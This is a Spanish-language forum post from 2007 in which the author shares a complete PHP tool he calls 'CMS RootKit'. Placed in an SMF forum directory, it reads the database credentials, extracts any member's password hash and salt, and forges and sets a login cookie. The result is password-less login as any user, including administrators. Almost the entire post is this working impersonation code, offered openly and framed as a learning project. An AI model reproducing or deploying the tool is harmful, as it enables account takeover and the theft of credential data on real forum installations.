elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  CMS RootKit by WHK
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: CMS RootKit by WHK  (Leído 1,663 veces)
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
CMS RootKit by WHK
« en: 8 Diciembre 2007, 02:00 am »

Hola, estoy creando un sistema en PHP que se basa en la administración de sistemas CMS, la idea es poder aprender de cada uno... smf, wordpress, etc.

Por ejemplo con tan solo visualizarlo en un directorio de smf podras iniciar seción como cualquier usuario sin la necesidad del password entendiendo la estructura de la cookie, tambien quiero hacerlo para wordpress entre otras cosas mas.

Hice la pagina pero quiero subirla como pagina demostrativa en http://lab.jccharry.com/ pero para eso necesito verificar bien que no tenga alguna vulnerabilidad como por ejemplo alguna inyección sql ya que se basa en consultas a la base de datos. De todas formas lo haré en una cuenta aparte sin derechos de sobreescribir nada ni de leer otras bases de datos pero prefiero evitar antes que lamentar.

Código
  1. <?php
  2.  
  3. #################################################
  4. # Archivo : rk.php #
  5. # Nombre : CMS RootKit #
  6. # Version : 2.3 Beta     #
  7. # Autor   : WHK         #
  8. # Sistemas CMS soportados : SMF 1.1.4 #
  9. #################################################
  10.  
  11. // Declaraciones, variables y constantes ============================================
  12. $rk_path_smf = "./Settings.php";
  13. $rk_path_wordpress = "./wp-config.php";
  14. $rk_cms = rk_filtro($_GET["CMS"]);
  15. $rk_id = rk_filtro($_GET["id"]);
  16. // $rk_tipo_user = rk_filtro($_GET["tipo_user"]);
  17. $rk_username = rk_filtro($_GET["username"]);
  18. $rk_cookiename = urlencode($_GET["cookiename"]);
  19. $rk_id_MEMBER = rk_filtro($_GET["ID_MEMBER"]);
  20. $rk_id_GROUP = rk_filtro($_GET["ID_GROUP"]);
  21. $rk_passwd = rk_filtro($_GET["passwd"]);
  22. $rk_passwordSalt = rk_filtro($_GET["passwordSalt"]);
  23. $rk_header = "<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">
  24. <html>
  25. <head>
  26. <title>CMS RootKit by WHK</title>
  27. </head>
  28. <body style=\"color: rgb(255, 255, 255); background-color: rgb(102, 0, 0);\" alink=\"white\" link=\"white\" vlink=\"white\">\n<div style=\"text-align: center;\">
  29. <big>
  30. <span style=\"font-weight: bold;\"><a href=\"?\">CMS RootKit by WHK</a></span>
  31. </big><br />
  32. </div><br /><br />
  33. <table style=\"text-align: center; width: 100%; font-weight: bold;\" border=\"0\">
  34. <tbody>
  35. <tr>
  36. <td>Herramientas</td>
  37. </tr>
  38. </tbody>
  39. </table>
  40. <table style=\"text-align: center; width: 100%;\" border=\"1\" cellpadding=\"0\" cellspacing=\"0\">
  41. <tbody>
  42. <tr>
  43. <td><a href=\"?CMS=crear\">Crear cookie</a></td>
  44. </tr>
  45. </tbody>
  46. </table>
  47. <br /><br />";
  48. $rk_footer = "</body>
  49. </html>";
  50. $rk_consola_a = "<span style=\"font-style: italic; font-weight: bold;\">Debugger</span><br />
  51. <table style=\"text-align: left; width: 100%; color: rgb(51, 255, 51);\" border=\"2\" cellpadding=\"0\" cellspacing=\"0\">
  52. <tbody>
  53. <tr>
  54. <td style=\"background-color: rgb(0, 0, 0);\">\n";
  55. $rk_consola_b = "</td>
  56. </tr>
  57. </tbody>
  58. </table>\n";
  59. $rk_contenido_1 = "<br /><br />
  60. <span style=\"font-weight: bold;\"> Haz click sobre el sistema CMS que deseas administrar.</span>\n";
  61. $rk_contenido_2 = "<span style=\"font-weight: bold;\">Ingrese el nombre de usuario registrado para iniciar seci&oacute;n, o si
  62. lo prefieres puedes ingresar &uacute;nicamente el numero de usuario registrado.
  63. (No se requiere password).<br /><br />
  64. </span>
  65. <form method=\"get\">
  66. <input name=\"CMS\" value=\"SMF\" type=\"hidden\">
  67. <table border=\"0\" cellpadding=\"1\" cellspacing=\"0\">
  68. <tbody>
  69. <tr>
  70. <td>Username:&nbsp;</td>
  71. <td><input name=\"username\" type=\"text\"></td>
  72. <td><input value=\"Ingresar\" type=\"submit\"></td>
  73. </tr>
  74. </form>
  75. <form method=\"get\">
  76. <input name=\"CMS\" value=\"SMF\" type=\"hidden\">
  77. <tr>
  78. <td>Id N&ordm;:&nbsp;</td>
  79. <td><input name=\"id\" type=\"text\"></td>
  80. <td><input value=\"Ingresar\" type=\"submit\"></td>
  81. </tr>
  82. </tbody>
  83. </table>
  84. </form>\n";
  85. $rk_error_1 = "Falta cookiename";
  86. $rk_error_2 = "Falta ID_MEMBER";
  87. $rk_error_3 = "Falta passwd";
  88. $rk_error_4 = "Falta passwordSalt";
  89. $rk_error_5 = "Falta ID_GROUP";
  90. $rk_comando_0 = "root@system:~$ <br />\n";
  91. $rk_comando_1 = "root@system:~$ rk&nbsp;-cms verificar<br />\n";
  92. $rk_comando_2 = "root@system:~$ rk&nbsp;-cms $rk_cms<br />\n";
  93. $rk_comando_3 = "root@system:~$ rk&nbsp;-cms $rk_cms -username $rk_username<br />\n";
  94. $rk_comando_4 = "root@system:~$ rk&nbsp;-cms $rk_cms -cookiename $rk_cookiename -ID_MEMBER $rk_id_MEMBER -passwd *** -passwordSalt $rk_passwordSalt<br />\n";
  95. // ==================================================================================
  96.  
  97. // Funciónes ========================================================================
  98. // Filtro ---------------------------------------------------------------------------
  99. function rk_filtro($rk_input){
  100. $rk_referer = htmlspecialchars($_SERVER['HTTP_REFERER']);
  101. $rk_filtro = array("`", "´", '"', "<", ">", ";", "'", "%60", "%C2%B4", "%22", "%3E", "%3C","%27", "%25", "%");
  102. for ($rk_i=0; $rk_i < count($rk_filtro) ; $rk_i++) {
  103.  if(eregi($rk_filtro[$rk_i],$rk_input)) {
  104. echo "<center>Por razones de seguridad no puede mostrarse la p&aacute;gina debido a que has ingresado<br />
  105. uno o mas caracteres prohibidos (".htmlspecialchars($rk_filtro[$rk_i]).") dentro de alg&uacute;n campo.<br /><br />
  106. <a href=\"$rk_referer\">Buelva a intentarlo por favor</a>.</center>\n";
  107.   exit(1);
  108.  }
  109. }
  110. return mysql_escape_string(htmlspecialchars($rk_input, ENT_QUOTES));
  111. }
  112. // ----------------------------------------------------------------------------------
  113.  
  114. // Verificación de sistemas CMS -----------------------------------------------------
  115. function rk_verificar($rk_vcms, $rk_path){
  116. if (file_exists($rk_path)) {
  117.  rk_consola("Se ha detectado un sistema <a style=\"color: rgb(51, 255, 51);\" href=\"?CMS=$rk_vcms\">$rk_vcms</a> en este directorio.");
  118.  return false;
  119. } else {
  120.  return true;
  121. }
  122. }
  123. // ----------------------------------------------------------------------------------
  124.  
  125. // Mensaje de error -----------------------------------------------------------------
  126. function rk_error($rk_ferror){
  127. echo "<font style='color: red'>[!] $rk_ferror</font><br />\n";
  128. return true;
  129. }
  130. // ----------------------------------------------------------------------------------
  131.  
  132. // Mensaje rojo ---------------------------------------------------------------------
  133. function rk_msg_rojo($rk_fcolor){
  134. echo "<span style=\"font-weight: bold; color: rgb(204, 0, 0);\">$rk_fcolor</span>";
  135. }
  136. // ----------------------------------------------------------------------------------
  137.  
  138. // Mensaje verde --------------------------------------------------------------------
  139. function rk_msg_verde($rk_fcolor){
  140. echo "<span style=\"font-weight: bold; color: rgb(0, 153, 0);\">$rk_fcolor</span>";
  141. }
  142. // ----------------------------------------------------------------------------------
  143.  
  144. // Mensaje multicolor ---------------------------------------------------------------
  145. function rk_msg_multicolor($rk_fcolor, $verificar){
  146. if($verificar == "1"){
  147.  rk_msg_rojo($rk_fcolor);
  148. } else {
  149.  rk_msg_verde($rk_fcolor);
  150. }
  151. }
  152. // ----------------------------------------------------------------------------------
  153.  
  154. // Mensaje de consola ---------------------------------------------------------------
  155. function rk_consola($rk_fconsola){
  156. echo "[*] $rk_fconsola<br />\n";
  157. }
  158. // ----------------------------------------------------------------------------------
  159. // ==================================================================================
  160.  
  161. // Inicio ===========================================================================
  162. if($rk_cms == ""){
  163. echo $rk_header;
  164. echo $rk_consola_a;
  165. echo $rk_comando_1;
  166. rk_consola("Verificando sistemas CMS ...");
  167.  
  168. // Verificando sistemas CMS... -----------------------------------------------------
  169. if (!rk_verificar("SMF", $rk_path_smf)) {
  170.  $rk_b = "1";
  171. }
  172.  
  173. if (!rk_verificar("Wordpress", $rk_path_wordpress)) {
  174.  $rk_b = "1";
  175. }
  176. // ----------------------------------------------------------------------------------
  177.  
  178. if ($rk_b != "1") {
  179.  rk_error("No se ha detectado ning&uacute;n sistema CMS.<br />\n");
  180.  echo "<br />$rk_comando_0\n";
  181.  echo $rk_consola_b;
  182.  echo $rk_footer;
  183.  exit(1);
  184. } else {
  185.  echo "<br />$rk_comando_0\n";
  186.  echo $rk_consola_b;
  187.  echo $rk_contenido_1;
  188.  echo $rk_footer;
  189.  exit(0);
  190. }
  191. }
  192. // ==================================================================================
  193.  
  194. // Crear cookie =====================================================================
  195. $rk_e = "1";
  196. if($rk_cms == "crear") {
  197. if ($rk_cookiename == "") { $rk_f1 = "1"  ; $rk_e++ ; }
  198. if ($rk_id_MEMBER == "") { $rk_f2 = "1"  ; $rk_e++ ; }
  199. if ($rk_passwd == "") { $rk_f3 = "1"  ; $rk_e++ ; }
  200. if ($rk_passwordSalt == "") { $rk_f4 = "1"  ; $rk_e++ ; }
  201. if ($rk_id_GROUP == "") { $rk_f5 = "1"  ; $rk_e++ ; }
  202. if ($rk_e == "6") {
  203. echo $rk_header;
  204. echo "<span style=\"font-weight: bold; text-decoration: underline;\">SMF</span>
  205. <form method=\"get\">
  206. <table style=\"text-align: left; width: 100%;\" border=\"1\"
  207. cellpadding=\"1\" cellspacing=\"0\">
  208.  <tbody>
  209.    <tr>
  210.      <td>
  211.      <input name=\"CMS\" value=\"crear\" type=\"hidden\">
  212.      <table border=\"0\" cellpadding=\"1\" cellspacing=\"0\">
  213.        <tbody>
  214.          <tr>
  215.            <td>cookiename:&nbsp;</td>
  216.            <td><input name=\"cookiename\" type=\"text\"></td>
  217.          </tr>
  218.          <tr>
  219.            <td>ID_MEMBER:&nbsp;</td>
  220.            <td><input name=\"ID_MEMBER\" type=\"text\"></td>
  221.          </tr>
  222.          <tr>
  223.            <td>Passwd (HASH):&nbsp;</td>
  224.            <td><input name=\"passwd\" type=\"text\"></td>
  225.          </tr>
  226.          <tr>
  227.            <td>passwordSalt:&nbsp;</td>
  228.            <td><input name=\"passwordSalt\" type=\"text\"></td>
  229.          </tr>
  230.          <tr>
  231.            <td>ID_GROUP:&nbsp;</td>
  232.            <td><input name=\"ID_GROUP\" type=\"text\"></td>
  233.            <td><input value=\"Generar cookie\" type=\"submit\"></td>
  234.          </tr>
  235.        </tbody>
  236.      </table>
  237.      </td>
  238.    </tr>
  239.  </tbody>
  240. </table>
  241. </form>
  242. <br />
  243. Ingresa los siguientes datos para generar tu cookie.";
  244. echo $rk_footer;
  245. } else {
  246. if ($rk_e  >= "2") {
  247. echo "$rk_header $rk_consola_a $rk_comando_4";
  248. if ($rk_f1 == "1") { rk_error("$rk_error_1"); }
  249. if ($rk_f2 == "1") { rk_error("$rk_error_2"); }
  250. if ($rk_f3 == "1") { rk_error("$rk_error_3"); }
  251. if ($rk_f4 == "1") { rk_error("$rk_error_4"); }
  252. if ($rk_f5 == "1") { rk_error("$rk_error_5"); }
  253. echo "<br />$rk_comando_0\n$rk_consola_b ";
  254. echo "<br /><span style=\"font-weight: bold; text-decoration: underline;\">SMF</span>
  255. <form method=\"get\">
  256. <table style=\"text-align: left; width: 100%;\" border=\"1\"
  257. cellpadding=\"1\" cellspacing=\"0\">
  258.  <tbody>
  259.    <tr>
  260.      <td>
  261.      <input name=\"CMS\" value=\"crear\" type=\"hidden\">
  262.      <table border=\"0\" cellpadding=\"1\" cellspacing=\"0\">
  263.        <tbody>
  264.          <tr>
  265.            <td>";rk_msg_multicolor("cookiename:", $rk_f1);echo"&nbsp;</td>
  266.            <td><input name=\"cookiename\" type=\"text\" value=\"$rk_cookiename\"></td>
  267.          </tr>
  268.          <tr>
  269.            <td>";rk_msg_multicolor("ID_MEMBER:", $rk_f2);echo"&nbsp;</td>
  270.            <td><input name=\"ID_MEMBER\" type=\"text\" value=\"$rk_id_MEMBER\"></td>
  271.          </tr>
  272.          <tr>
  273.            <td>";rk_msg_multicolor("Passwd (HASH):", $rk_f3);echo"&nbsp;</td>
  274.            <td><input name=\"passwd\" type=\"text\" value=\"$rk_passwd\"></td>
  275.          </tr>
  276.          <tr>
  277.            <td>";rk_msg_multicolor("passwordSalt:", $rk_f4);echo"&nbsp;</td>
  278.            <td><input name=\"passwordSalt\" type=\"text\" value=\"$rk_passwordSalt\"></td>
  279.          </tr>
  280.          <tr>
  281.            <td>";rk_msg_multicolor("ID_GROUP:", $rk_f5);echo"&nbsp;</td>
  282.            <td><input name=\"ID_GROUP\" type=\"text\" value=\"$rk_id_GROUP\"></td>
  283.            <td><input value=\"Generar cookie\" type=\"submit\"></td>
  284.          </tr>
  285.        </tbody>
  286.      </table>
  287.      </td>
  288.    </tr>
  289.  </tbody>
  290. </table>
  291. </form>
  292. <br />
  293. Ingresa los siguientes datos para generar tu cookie.";
  294. echo $rk_footer;
  295. }
  296.  
  297. if ($rk_e == "1") {
  298. echo $rk_header;
  299. echo $rk_consola_a;
  300. echo $rk_comando_4;
  301. if($rk_id_GROUP == "1") {
  302.  // Administrador
  303.  rk_consola("Construyendo cookie...");
  304.  rk_consola("Datos:");
  305.  echo "<font style='color: red'>\n[!] cookiename: $rk_cookiename<br />\n";
  306.  echo "[!] ID_MEMBER: $rk_id_MEMBER<br />\n";
  307.  echo "[!] passwd (hash): $rk_passwd<br />\n";
  308.  echo "[!] passwordSalt: $rk_passwordSalt</font><br />\n";
  309.  rk_consola("Cookie : $rk_cookiename=".urlencode("a:4:{i:0;s:1:\"$rk_id_MEMBER\";i:1;s:40:\"".sha1($rk_passwd.$rk_passwordSalt)."\";i:2;i:1196740416;i:3;i:0;}"));
  310.  echo "<br />$rk_comando_0\n";
  311.  echo $rk_consola_b;
  312.  echo $rk_footer;
  313. }
  314. if($rk_id_GROUP == "0") {
  315.  // Usuario
  316.  rk_consola("Construyendo cookie...");
  317.  rk_consola("Datos:");
  318.  echo "<font style='color: red'>\n[!] cookiename: $rk_cookiename<br />\n";
  319.  echo "[!] ID_MEMBER: $rk_id_MEMBER<br />\n";
  320.  echo "[!] passwd (hash): $rk_passwd<br />\n";
  321.  echo "[!] passwordSalt: $rk_passwordSalt</font><br />\n";
  322.  rk_consola("Cookie : $rk_cookiename=".urlencode("a:4:{i:0;i:$rk_id_MEMBER;i:1;s:40:\"".sha1($rk_passwd.$rk_passwordSalt)."\";i:2;i:1196740416;i:3;i:0;}"));
  323.  echo "<br />$rk_comando_0\n";
  324.  echo $rk_consola_b;
  325.  echo $rk_footer;
  326. }
  327. }
  328. }
  329. }
  330. // ==================================================================================
  331.  
  332. // SMF ==============================================================================
  333. if($rk_cms == "SMF") {
  334. echo $rk_header;
  335. echo $rk_consola_a;
  336. if($rk_username != ""){
  337.  echo $rk_comando_3;
  338. } else {
  339.  echo $rk_comando_2;
  340. }
  341. // Verificando la existencia de SMF -------------------------------------------------
  342. rk_consola("Verificando sistema SMF...");
  343. if (file_exists($rk_path_smf)) {
  344.  define("SMF", 1);
  345.  include($rk_path_smf);
  346. rk_consola("Verifici&oacute;n satisfactoria.");
  347. } else {
  348.  rk_error("No existe el sistema CMS en este directorio.");
  349.  echo "<br />$rk_comando_0\n";
  350.  echo $rk_consola_b;
  351.  echo $rk_footer;
  352.  exit(1);
  353. }
  354.  
  355. // Definiendo conexión SQL ---------------------------------------------------------
  356. define (SERVER, $db_server);
  357. define (USER, $db_user);
  358. define (PASS, $db_passwd);
  359. define (DB,   $db_name);
  360. // ----------------------------------------------------------------------------------------
  361.  
  362. // Función de la consulta SQL -------------------------------------------------------
  363. function rk_db_query($rk_sql){
  364. if (!$rk_conectar = @mysql_pconnect(SERVER, USER, PASS)){
  365.  rk_error("Error en la conecci&oacute;n.");
  366.  return false;
  367. }
  368. if (!@mysql_select_db(DB,$rk_conectar) ){
  369.  rk_error("Error al seleccionar la base de datos.");
  370.  return false;
  371. }
  372. if (!$rk_query = @mysql_query($rk_sql,$rk_conectar) ){
  373.  rk_error("Error al efectuar la busqueda.");
  374.  return false;
  375. }
  376. return $rk_query;
  377. }
  378.  
  379. // Verificando ID_MEMBER y memberName ------------------------------------------------
  380. $rk_consulta2 = "SELECT ID_MEMBER FROM `".$db_prefix."members`";
  381. if ($rk_id != "") {
  382.  $rk_consulta = "SELECT * FROM `".$db_prefix."members` WHERE ID_MEMBER = $rk_id";
  383.  $c_ = "1";
  384. }
  385.  
  386. if ($c_ != "1") {
  387.  if ($rk_username != "") {
  388.   $rk_consulta = "SELECT * FROM `".$db_prefix."members` WHERE `memberName` LIKE CONVERT(_utf8 '$rk_username' USING latin1) COLLATE latin1_swedish_ci";
  389.  }
  390. }
  391.  
  392. // Buscando usuario ------------------------------------------------------------------
  393. rk_consola("Conectando...");
  394. if(($rk_username == "") and ($rk_id == "")){
  395.  if ($rk_query = rk_db_query($rk_consulta2)){
  396.   $rk_whk = "1";
  397.   while ($rk_row = mysql_fetch_row($rk_query)){
  398.    foreach ($rk_row as $rk_out)
  399.     $rk_whk++;
  400.   }
  401.   $rk_whk_out = $rk_whk - 1;
  402.   rk_consola("Conecci&oacute;n satisfactoria.");
  403.  }
  404.  rk_consola("Numero de usuarios registrados: $rk_whk_out");
  405.  echo "<br />$rk_comando_0\n";
  406.  echo $rk_consola_b;
  407.  echo $rk_contenido_2;
  408.  echo $rk_footer;
  409.  exit(0);
  410.  
  411. } else {
  412.  if ($rk_query = rk_db_query($rk_consulta)){
  413.   rk_consola("Conecci&oacute;n satisfactoria.");
  414.   if ($c_ == "1") {
  415.    rk_consola("Buscando usuario N&ordm;$rk_id ...");
  416.   } else {
  417.    rk_consola("Buscando usuario $rk_username...");
  418.   }
  419.   $rk_whk = 1;
  420.   while ($rk_row = mysql_fetch_row($rk_query)){
  421.    foreach ($rk_row as $rk_out){
  422.     if ($rk_whk == "1" ){ $rk_idMEMBER_out = $rk_out; }
  423.     if ($rk_whk == "2" ){ $rk_usernameout = $rk_out; }
  424.     if ($rk_whk == "5" ){ $rk_idGROUP_out = $rk_out; }
  425.     if ($rk_whk == "14"){ $rk_passwd_out = $rk_out; }
  426.     if ($rk_whk == "52"){ $rk_passwordSalt_out = $rk_out; }
  427.     $rk_whk++;
  428.    }
  429.   }
  430.  }
  431. }
  432.  
  433. // Aplicando cookie ------------------------------------------------------------------
  434. if($rk_idGROUP_out == "1") {
  435.  // Administrador
  436.  rk_consola("Usuario encontrado. Construyendo cookie...");
  437.  rk_consola("Datos:");
  438.  echo "<font style='color: red'>\n[!] cookiename: $cookiename<br />\n";
  439.  echo "[!] Username: $rk_usernameout<br />\n";
  440.  echo "[!] ID_MEMBER: $rk_idMEMBER_out<br />\n";
  441.  echo "[!] passwd (hash): $rk_passwd_out<br />\n";
  442.  echo "[!] passwordSalt: $rk_passwordSalt_out<br />\n";
  443.  echo "[!] ID_GROUP: $rk_idGROUP_out (Administrador)</font><br />\n";
  444.  echo "<script>void(document.cookie='$cookiename=".urlencode("a:4:{i:0;s:1:\"$rk_idMEMBER_out\";i:1;s:40:\"".sha1($rk_passwd_out.$rk_passwordSalt_out)."\";i:2;i:1196740416;i:3;i:0;}")."');</script>\n";
  445.  rk_consola("Cookie aplicada.");
  446. }
  447. if($rk_idGROUP_out == "0") {
  448.  // Usuario
  449.  rk_consola("Usuario encontrado. Construyendo cookie...");
  450.  rk_consola("Datos:");
  451.  echo "<font style='color: red'>\n[!] cookiename: $cookiename<br />\n";
  452.  echo "[!] Username: $rk_usernameout<br />\n";
  453.  echo "[!] ID_MEMBER: $rk_idMEMBER_out<br />\n";
  454.  echo "[!] passwd (hash): $rk_passwd_out<br />\n";
  455.  echo "[!] passwordSalt: $rk_passwordSalt_out<br />\n";
  456.  echo "[!] ID_GROUP: $rk_idGROUP_out (Usuario)</font><br />\n";
  457.  echo "<script>void(document.cookie='$cookiename=".urlencode("a:4:{i:0;i:$rk_idMEMBER_out;i:1;s:40:\"".sha1($rk_passwd_out.$rk_passwordSalt_out)."\";i:2;i:1196740416;i:3;i:0;}")."');</script>\n";
  458.  rk_consola("Cookie aplicada.");
  459. }
  460. if($rk_idGROUP_out == "") {
  461.  // Ninguno
  462.  rk_error("Usuario inexistente.<br />\n");
  463. }
  464. echo "<br />$rk_comando_0\n";
  465. echo $rk_consola_b;
  466. echo $rk_contenido_2;
  467. echo $rk_footer;
  468. }
  469. // ----------------------------------------------------------------------------------
  470. // ==================================================================================
  471.  
  472. // Wordpress ========================================================================
  473. if($rk_cms == "Wordpress") {
  474. echo $rk_header;
  475. echo $rk_consola_a;
  476. echo $rk_comando_2;
  477. rk_error("En construcci&oacute;n.");
  478. echo "<br />$rk_comando_0\n";
  479. echo $rk_consola_b;
  480. echo $rk_footer;
  481. }
  482. // ==================================================================================
  483.  
  484. ?>


Acá les dejo el avance del sistema, si alguien ve alguna falla antes de subirlo porfavor que me lo pueda decir.
todavía no está 100% terminado pero si operativo.
Una copia del código lo dejé acá:
http://foro.jccharry.com/index.php?topic=42.0
donde explico el fin de este archivo.


« Última modificación: 8 Diciembre 2007, 02:06 am por WHK » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problemónnnn: posible RootKit
Windows
Javi Metal 1 2,898 Último mensaje 11 Marzo 2015, 22:13 pm
por xv0
Que es un rootkit
Seguridad
Benjamin Clay 1 2,194 Último mensaje 26 Septiembre 2017, 03:51 am
por MCKSys Argentina
Spectre Rootkit - Source
Análisis y Diseño de Malware
r32 1 2,473 Último mensaje 7 Agosto 2020, 12:06 pm
por Usuario887
OpenArk - Anti-rootkit
Seguridad
ehn@ 0 2,581 Último mensaje 7 Mayo 2023, 18:53 pm
por ehn@
r77 Rootkit - Ring 3
Análisis y Diseño de Malware
ehn@ 0 3,230 Último mensaje 20 Mayo 2023, 21:10 pm
por ehn@
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines